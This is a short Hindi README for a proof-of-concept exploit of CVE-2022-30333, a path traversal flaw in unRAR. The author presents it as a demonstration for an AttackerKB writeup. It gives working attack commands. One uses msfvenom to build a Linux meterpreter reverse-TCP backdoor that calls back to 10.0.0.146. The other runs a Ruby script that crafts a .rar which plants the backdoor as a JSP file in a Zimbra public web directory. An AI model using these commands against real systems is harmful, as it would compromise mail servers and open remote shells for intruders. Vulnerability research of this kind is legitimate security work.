
CVE-2022-30333 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, unRAR में पथ ट्रैवर्सल, जो दुर्भावनापूर्ण .rar फ़ाइलें उत्पन्न करके आक्रमणकारी-निर्दिष्ट स्थानों पर मनमाने पेलोड निकालता है।
CVE-2022-30333 के लिए एक प्रूफ ऑफ कॉन्सेप्ट - यह unRAR के संस्करण 6.11 से पहले के संस्करणों में पथ ट्रैवर्सल भेद्यता है। मैंने इसे AttackerKB writeup के लिए एक प्रदर्शन के रूप में बनाया है, और जल्द ही इसे Metasploit Module में शामिल करने की उम्मीद है!
मूल रूप से, आप एक लक्ष्य (पथ ट्रैवर्सल सहित) और कुछ फ़ाइल डेटा प्रदान करते हैं, और यह टूल एक .rar जनरेट करेगा जो उस फ़ाइल को उस स्थान पर निकालेगा। अधिकतम फ़ाइल लंबाई 104 बाइट्स है, और अधिकतम फ़ाइल लंबाई 4096 बाइट्स है। (यह भेद्यता में अंतर्निहित नहीं है, यह सिर्फ वही है जो मैंने फ़ाइल जनरेट करते समय चुना था)।
उदाहरण के लिए, msfvenom के साथ एक बैकडोर जनरेट करें:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
फिर एक .rar फ़ाइल बनाएं, और .jsp को किसी मज़ेदार स्थान पर रोपें:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar